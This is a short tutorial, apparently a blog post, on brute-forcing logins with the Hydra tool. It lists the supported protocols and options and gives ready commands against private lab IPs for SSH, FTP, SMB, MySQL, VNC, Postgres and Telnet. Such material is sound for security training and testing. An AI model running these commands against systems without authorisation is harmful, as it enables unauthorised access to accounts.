twitter

Hydra – Brute Force Techniques


Hydra is a powerful authentication brute forcing tools for many protocols and services. In this tutorial, I will be showing how to brute force logins for several remote systems.

Basic Hydra usage
hydra <Username options> <Password options> <Options> <IP Address> <Protocol> -V -f

Supported Services
adam6500 asterisk cisco cisco-enable cvs firebird ftp ftps http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp

Options
-l  Single Username
-L Username list
-p Password
-P Password list
-t Limit concurrent connections
-V Verbose output
-f Stop on correct login
-s Port

In the examples below, you will see the service, Command, and an example screenshot.
Found credentials will be in green.

SSH
hydra -L usernames.txt -P passwords.txt 192.168.2.66 ssh -V

FTP
hydra -L usernames.txt -P passwords.txt 192.168.2.62 ftp -V -f

SMB
hydra -L usernames.txt -P passwords.txt 192.168.2.66 smb -V -f


MySQL

hydra -L usernames.txt -P passwords.txt 192.168.2.66 mysql -V -f

Note: MySQL did not have a password set. I had to add a blank line in the password list.

VNC
hydra -P passwords.txt 192.168.2.62 vnc -V

Note: VNC does not utilize a username and is not included in the command.

Postgresql
hydra -L usernames.txt -P passwords.txt 192.168.2.62 postgres -V

Telnet
hydra -L usernames.txt -P passwords.txt 192.168.2.62 telnet -V